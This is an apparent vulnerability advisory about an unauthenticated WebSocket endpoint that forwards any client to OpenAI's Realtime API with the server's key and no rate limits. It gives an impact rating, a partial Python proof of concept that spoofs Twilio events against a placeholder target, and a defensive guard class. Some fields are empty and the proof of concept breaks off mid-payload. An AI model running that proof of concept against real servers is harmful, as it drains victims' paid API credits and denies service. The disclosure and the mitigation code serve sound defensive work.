# Vulnerability Summary: Unauthenticated WebSocket Endpoint Proxies to Paid OpenAI Realtime API Without Rate Limits

## Overview

This vulnerability exists in the  file. The WebSocket endpoint accepts connections from any client without authentication or signature verification. Every connection opens an authenticated session on OpenAI's Realtime API using the server's API key. The endpoint imposes no limit on the number of connections, the message rate or the message size, so an attacker can exhaust server resources and drain the victim's OpenAI API credits.

## Impact

Affected versions:

CVSS score: 7.5 / 10 (High)

Specific harm:

1. **OpenAI API credit exhaustion**: each unauthenticated WebSocket connection opens a billable OpenAI Realtime API session. The Realtime API is billed per second of audio, which can cause substantial financial loss.
2. **Denial of service (DoS)**: once server resources (memory, file descriptors, OpenAI API rate limits) are consumed by attacker connections, legitimate Twilio callers can no longer be served.
3. **Server memory exhaustion**: with no message-size limit (the default is 10 MB) and no connection limit, an attacker can consume server memory by sending a large number of large-payload messages.

## POC code (Proof of Concept)

```bash
# Step 1: Verify the endpoint is accessible and accepts connections
python -c "
import asyncio
import websockets
import json

async def test():
    async with websockets.connect('ws://TARGET:8000/media-stream') as ws:
        # Send a start event (mimicking Twilio)
        await ws.send(json.dumps({
            'event': 'start',
            'start': {'streamSid': 'attacker-session-1'}
        }))
        # Send a media event - this gets forwarded to OpenAI Realtime API
        await ws.send(json.dumps({
            'event': 'media',
            'media': {'payload':
```
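A server-side guard covering the gaps named above (handshake signature check, connection cap, message-size limit, per-stream media rate limit, and no media forwarded before a `start` event), added here as an example rather than code from the affected project. It assumes Twilio's `X-Twilio-Signature` for the WebSocket handshake is base64(HMAC-SHA1(auth token, stream URL)); the limit values and the `StreamGuard` class are constructed for illustration.

```python
import base64, hashlib, hmac, json, time

# Constructed limits; a real Twilio call sends ~50 small mu-law frames/s per stream.
MAX_CONNECTIONS, MAX_MESSAGE_BYTES = 20, 16 * 1024
MEDIA_EVENTS_PER_SEC, BURST = 60.0, 100

def twilio_signature(auth_token: str, url: str) -> str:
    # Assumed Twilio scheme: base64(HMAC-SHA1(auth_token, url)); the WebSocket
    # handshake carries no POST params, so only the stream URL is signed.
    mac = hmac.new(auth_token.encode(), url.encode(), hashlib.sha1).digest()
    return base64.b64encode(mac).decode()

def verify_twilio_signature(auth_token: str, url: str, header) -> bool:
    return hmac.compare_digest(twilio_signature(auth_token, url), header or "")

class StreamGuard:
    active = 0  # admitted streams in this process; each costs one OpenAI session
    def __init__(self, now=time.monotonic):
        self.now, self.last, self.tokens = now, now(), float(BURST)
        self.started = self.admitted = False
    def admit(self) -> bool:  # call before opening the upstream OpenAI session
        if StreamGuard.active >= MAX_CONNECTIONS:
            return False
        StreamGuard.active += 1
        self.admitted = True
        return True
    def close(self) -> None:  # call on disconnect so the cap recovers
        if self.admitted:
            StreamGuard.active -= 1
            self.admitted = False
    def check_message(self, raw: str):
        # Returns (ok, reason); only ok=True messages are forwarded upstream.
        if len(raw.encode()) > MAX_MESSAGE_BYTES:
            return False, "oversized"
        try:
            event = json.loads(raw).get("event")
        except (ValueError, AttributeError):
            return False, "bad-json"
        if event != "media":  # start/connected/mark/stop are cheap to pass on
            self.started = self.started or event == "start"
            return True, event or "unknown"
        if not self.started:
            return False, "media-before-start"
        t = self.now()  # token bucket refilled at a real call's frame rate
        self.tokens = min(BURST, self.tokens + (t - self.last) * MEDIA_EVENTS_PER_SEC)
        self.last = t
        if self.tokens < 1:
            return False, "rate-limited"
        self.tokens -= 1
        return True, "media"
```

Run `verify_twilio_signature` on the handshake, then `admit()` before opening the upstream session, `check_message()` on every frame, and `close()` on disconnect.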